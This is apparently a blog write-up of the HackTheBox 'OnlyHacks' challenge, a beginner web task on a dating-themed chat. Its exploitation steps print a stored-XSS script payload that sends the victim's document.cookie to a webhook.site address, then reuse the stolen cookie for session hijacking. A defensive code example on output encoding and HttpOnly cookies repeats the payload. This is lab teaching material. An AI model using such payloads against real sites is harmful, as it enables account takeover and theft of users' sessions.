HackTheBox OnlyHacks Challenge

Explore the basics of cybersecurity in the OnlyHacks Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/860

Description

Dating and matching can be exciting, especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a unique URL from https://webhook.site/, and use it in place of the placeholder link in the payload below.

Demonstrate the XSS by sending:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Lastly, paste the captured cookie into the designated page and refresh.

Summary

The OnlyHacks Challenge on Hack The Box is a very-easy web challenge that involves Cross-Site Scripting (XSS) to steal session cookies. Participants register on a dating-themed platform, start a conversation, and inject a malicious JavaScript payload that sends the victim’s session cookie to a controlled webhook endpoint. By capturing and using the stolen cookie, they gain unauthorized access, demonstrating the impact of client-side script injection. The challenge highlights the dangers of improper input sanitization and emphasizes the need for secure handling of user-generated content to prevent XSS attacks.
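
The two fixes the summary points to, shown as an added example that is not the challenge's own code: output-encoding chat messages before they reach the page, and marking the session cookie HttpOnly so `document.cookie` cannot read it. All function names, the cookie name and the markup are hypothetical; the sample input is the message from the walkthrough above.

```javascript
// Added example: hypothetical chat-rendering helpers, not the challenge's code.

// Vulnerable pattern: message text is concatenated into markup unchanged,
// so any tags it contains become live markup in the recipient's page.
function renderMessageUnsafe(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Hardened pattern: encode the HTML-significant characters before
// interpolation so the browser treats the message as text, never as markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function renderMessageSafe(sender, text) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(text)}</div>`;
}

// Defence in depth: HttpOnly keeps the session cookie out of document.cookie,
// Secure restricts it to HTTPS, SameSite limits cross-site sends.
function sessionCookieHeader(name, value, maxAgeSeconds) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  return [
    `${name}=${encodeURIComponent(value)}`,
    'Path=/',
    `Max-Age=${maxAgeSeconds}`,
    'HttpOnly',
    'Secure',
    'SameSite=Lax',
  ].join('; ');
}

// Constructed sample input: the chat message used in the walkthrough.
const sample = "Hello there <script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>";

console.log('unsafe:', renderMessageUnsafe('match', sample));
console.log('safe:  ', renderMessageSafe('match', sample));
console.log('Set-Cookie:', sessionCookieHeader('session', 'constructed-token', 3600));
```

Encoding on output addresses the injection itself; the cookie flags only limit what an injected script can take, so both belong in the fix.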

This post is licensed under CC BY 4.0 by the author.